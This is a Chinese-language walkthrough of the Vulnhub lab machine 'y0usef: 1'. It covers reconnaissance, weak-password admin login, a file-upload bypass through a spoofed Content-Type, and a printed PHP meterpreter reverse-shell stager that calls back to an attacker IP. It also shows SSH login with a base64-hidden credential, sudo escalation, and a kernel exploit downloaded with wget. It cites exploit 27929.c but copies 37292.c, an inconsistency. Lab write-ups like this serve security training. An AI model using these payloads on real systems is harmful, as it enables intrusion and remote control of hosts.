0x01 靶机介绍
-
- Name: y0usef: 1
-
- Date release: 10 Dec 2020
-
- Author: y0usef
-
- Series: y0usef
-
- Description : Get two flag
-
- Difficulty : easy
https://www.vulnhub.com/entry/y0usef-1,624/
0x02 侦察
nmap -p- -sV -sC -A 192.168.0.104 -oA nmap_y0usef
gobuster dir -u http://192.168.0.104 -w
/usr/share/wordlists/dirb/big.txt -x php
切换大字典进行目录扫描,成功找到adminstration目录
gobuster dir -u http://192.168.0.104 -w
/usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-words.txt
访问`http://192.168.0.104/adminstration`提示被拒绝
0x03 上线【WWW-DATA】
再次访问成功绕过,出现管理员登录界面
使用弱口令admin/admin成功登录
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.105
lport=12345 -o shell.php
木马`shell.php`内容如下:
0); $ip = '192.168.0.105'; $port = 12345; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die(); error_reporting(
在本地开启监听
msfconsole -x "use exploit/multi/handler; set payload
php/meterpreter/reverse_tcp; set lhost 192.168.0.105; set
lport 12345; exploit -j;"
直接上传提示无法上传
修改Content-type为image/jpg后成功上传,其上传路径为files/1631375338shell.php
请求
http://192.168.0.104/adminstration/upload/files/1631375338shell.php
成功反弹
进入命令行界面,通过 Python 切换为 pty
python -c 'import pty;pty.spawn("/bin/bash")'
成功在用户家目录拿到第一个flag
0x04 权限提升
echo "c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=" | base64 -d
SSH登录
ssh yousef@192.168.0.104
sudo -l
sudo su
成功在管理员家目录拿到第二个flag
cd ~
cat root.txt
uname -a
cat /etc/issue
使用 searchsploit 根据内核版本查找可提权脚本
searchsploit linux 3.13.0
选择27929.c进行提权
cp /usr/share/exploitdb/exploits/linux/local/37292.c ./
在本地开启 http 服务
python -m SimpleHTTPServer 80
进入tmp目录下载 EXP 文件
wget http://192.168.0.105/37292.c
编译 EXP 并添加执行权限
gcc 37292.c -o exp
chmod 777 exp
执行 EXP 成功拿到管理员权限
./exp
cat /root/root.txt
0x05 知识星球
原文始发于微信公众号(狐狸说安全):Vulnhub Y0usef-1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论